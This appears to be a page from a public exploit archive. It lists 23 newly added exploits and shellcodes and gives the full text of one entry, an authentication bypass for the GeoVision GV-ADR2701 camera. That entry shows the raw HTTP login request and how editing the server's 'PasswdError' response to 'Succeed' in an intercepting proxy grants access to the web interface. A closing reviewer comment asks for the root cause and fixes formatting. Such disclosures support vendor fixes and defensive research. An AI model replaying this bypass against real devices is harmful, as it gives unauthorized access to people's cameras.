
23 changes to exploits/shellcodes/ghdb

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)
Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion
Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
GeoVision Camera GV-ADR2701 - Authentication Bypass
AD Manager Plus 7122 - Remote Code Execution (RCE)
Enlightenment v0.25.3 - Privilege escalation
Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
Apache 2.4.x - Buffer Overflow
perfSONAR v4.4.5 - Partial Blind CSRF
SugarCRM 12.2.0 - Remote Code Execution (RCE)
XCMS v1.83 - Remote Command Execution (RCE)
Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
Splashtop 8.71.12001.0 - Unquoted Service Path
Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
FlipRotation v1.0 decoder - Shellcode (146 bytes)
Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)
macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
72 lines
No EOL
1.7 KiB
Text
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10

# Exploitation
1. Capture The Login Request with burp, Do intercept request to response

Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1

{"UserName":"admin","Password":"0X]&0D]]05"}
```

2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```

By editing the response to the following, you can successfully log in to
the web application.

```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```
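
Review bot: The final step (the unnumbered "By editing the response to the following" paragraph) never states the root cause, so a reader has to infer what the device fails to enforce. The only fields that differ between the two responses are `"StatusCode": 460` / `"StatusString": "PasswdError"` and `"StatusCode": 0` / `"StatusString": "Succeed"`, and both carry `"Data": "null"`. That suggests the login decision is made by the browser-side script from the response body and that the server issues no session credential, but the file should say so explicitly and note whether later /LAPI requests are checked server-side, since that is what the vendor has to fix and what a defender needs in order to judge exposure. Smaller points: number this step 3 to match steps 1 and 2; reword "Do intercept request to response" in step 1, which presumably means intercepting the response to this request; `Content-Length: 170` is left unchanged in the edited response although its body is shorter than the original; and `clientIpAddr=182.168.10.10` in the Referer looks like a typo next to the 10.10.10.10 host.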